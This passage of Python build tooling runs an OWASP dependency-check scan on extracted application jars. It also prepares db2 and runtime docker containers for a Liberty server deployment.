                        f"cd {tmpdir} && mkdir {app}jarsfolder && unzip -o -j sma.war WEB-INF/lib/* -d {app}jarsfolder/ -x  WEB-INF/lib/platform*"
                    )
                run_subprocess(
                    f"cp -R {tmpdir}/{app}jarsfolder/* {tmpdir}/3rdpartyship")

            # download the latest depcheck
            download_depcheck_tool(tmpdir)

            # run dependency check
            reports_dir_path = f"reports/{get_date_str()}/{args.mode}"
            create_dir(reports_dir_path)
            run_subprocess(
                f"{tmpdir}/dependency-check/bin/dependency-check.sh -s {tmpdir}/3rdpartyship -o {reports_dir_path}/dependency_report.html --suppression {os.getcwd()}/suppressions.xml"
            )

            # copy reports to output directory
            run_subprocess(
                f"rsync -a -v --ignore-existing {os.getcwd()}/reports {args.output}"
            )

    except Exception as e:
        main_logger.warning(traceback.format_exc())
        main_logger.warning(e)
        # NOTE(review): the container is removed here AND again in finally;
        # the second `docker rm -f` is redundant (though harmless).
        run_subprocess(f"docker rm -f {DEPCHECK_SCAN}")
    finally:
        # always tear the depcheck container down
        run_subprocess(f"docker rm -f {DEPCHECK_SCAN}")
コード例 #29
0
def prep_containers(args, image_tags):
    """
    Prepare the rt and db2 container. This function will do the followings:
        - login to the registry
        - start db2 and rt containers
        - build the ear for deployment
        - start liberty server
        - wait for the server to be ready
        - logout of the registry

    Args:
        args ([dict]): the arguments passed to the script
        image_tags ([list]): candidate image tags, tried in order until one
            starts successfully
    """

    # clean up
    cleanup(args)

    # login to registry
    docker_login()

    # starting db2 and rt containers: try each tag, stop at first success
    main_logger.info("Starting db2 and rt containers...")
    for image_tag in image_tags:
        try:
            print()
            # banner around the attempted tag
            main_logger.info("#" * (len(f"Trying {image_tag}") + PADDING))
            main_logger.info(" " * int((PADDING / 2)) + f"Trying {image_tag}" +
                             " " * int((PADDING / 2)))
            main_logger.info("#" * (len(f"Trying {image_tag}") + PADDING))
            main_logger.info("Starting db2 and rt containers...")
            start_db2_container(args, image_tag)
            start_rt_container(args, image_tag)
            break
        except Exception as e:
            # failed tag -> log and try the next one
            main_logger.warning(e)

    # build the ear
    main_logger.info("Building ear file...")
    run_subprocess(
        f'docker exec {RT_SCAN} bash -lc "buildear -warfiles=smcfs,sbc,sma,isccs,wsc"'
    )

    # start liberty server
    main_logger.info("Starting liberty server...")
    run_subprocess(f'docker exec {RT_SCAN} bash -lc "__lbstart"')

    # wait for deployment to be ready
    main_logger.info("Wait for deployment to be ready...")
    main_logger.info(
        f"Checking deployment @ {DEPLOY_SERVER}/smcfs/console/login.jsp...")
    wait_for_deployment()

    # check to see if we need to restart the server
    if needs_server_restart():
        # restart the server (stop then start inside the rt container)
        main_logger.info("Restarting liberty server...")
        run_subprocess(
            f'docker exec {RT_SCAN} bash -lc "__lbstop && __lbstart"')

        # wait again for deployment to be ready after restarting
        main_logger.info(
            "Waiting again for deployment to be ready after restarting...")
        main_logger.info(
            f"Checking deployment @ {DEPLOY_SERVER}/smcfs/console/login.jsp..."
        )
        wait_for_deployment()

    main_logger.info("The db2 and rt containers are up and running...")

    # logout of registry
    docker_logout()